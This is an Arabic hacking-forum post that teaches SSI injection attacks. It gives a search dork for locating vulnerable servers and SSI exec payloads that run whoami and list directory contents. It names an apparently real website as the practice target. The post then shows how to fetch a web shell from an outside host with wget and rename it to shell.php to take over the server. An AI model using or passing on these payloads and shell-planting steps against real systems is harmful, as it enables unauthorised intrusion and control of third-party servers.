:: vBspiders Professional Network :: - قنبلة : شرح ثغرات من نوع ssi Injection

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- حقن xss - ssi (http://www.vbspiders.com/vb/f427.html)

- - قنبلة : شرح ثغرات من نوع ssi Injection (http://www.vbspiders.com/vb/t65348.html)

قنبلة : شرح ثغرات من نوع ssi Injection

السلام عليكم ورحمة الله وبركاتة

كيف الحال ؟

الموضوع محتاج فقط كاسه شاي

دورك بسيط : inurl:bin/Cklb/

ملاحضة : الموضوع ولفكرة مقتبسة من موقع اجنبي #

اكواد ممكن ان تستعملها

كود PHP:

   <!--#echo var="DATE_LOCAL" -->
Will display the Date

<!--#exec cmd="whoami"--> 
Will show which user is running on the server

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux) 
Will display all files in the directory

<!-- #exec cmd="dir" --> (Windows) 
Will display all files in the directory

هذا موقع للتطبيق #

http://dev.stockphotosamerica.com/bin/Cklb

نطبق الكود الثاني في الدخول

كود PHP:

   <pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>

نشوف

http://img843.imageshack.us/img843/6673/regionyo.png

http://img4.imageshack.us/img4/8881/regionoq.png

تمام الحين تاكدنا انه الثغرة موجودة وكل شيء تمام خلونا نجرب نرفع الشل

نفذ التالي

كود PHP:

   <!--#exec cmd="wget http://website.com/dir/shell.txt" -->

http://img135.imageshack.us/img135/3338/regiontv.png

خلونا نشوف اذا الملف اذا انرفع ولالا

عن طريق امر

كود PHP:

   <pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>

http://img690.imageshack.us/img690/2006/regionwt.png

تمام انرفع بنجاح بس انرفع بصيغة تكست نفذ الامر التالي لنحولة الى بي اتش بي

كود PHP:

   <!--#exec cmd="mv shell.txt shell.php" -->

ونتاكد الان

http://img803.imageshack.us/img803/2275/regionr.png

استعرض

http://img339.imageshack.us/img339/3094/regioncw.png

اتمنة وصلت المعلومة لكم كامل الاحترام والتقدير

اخوكم حمد المهندي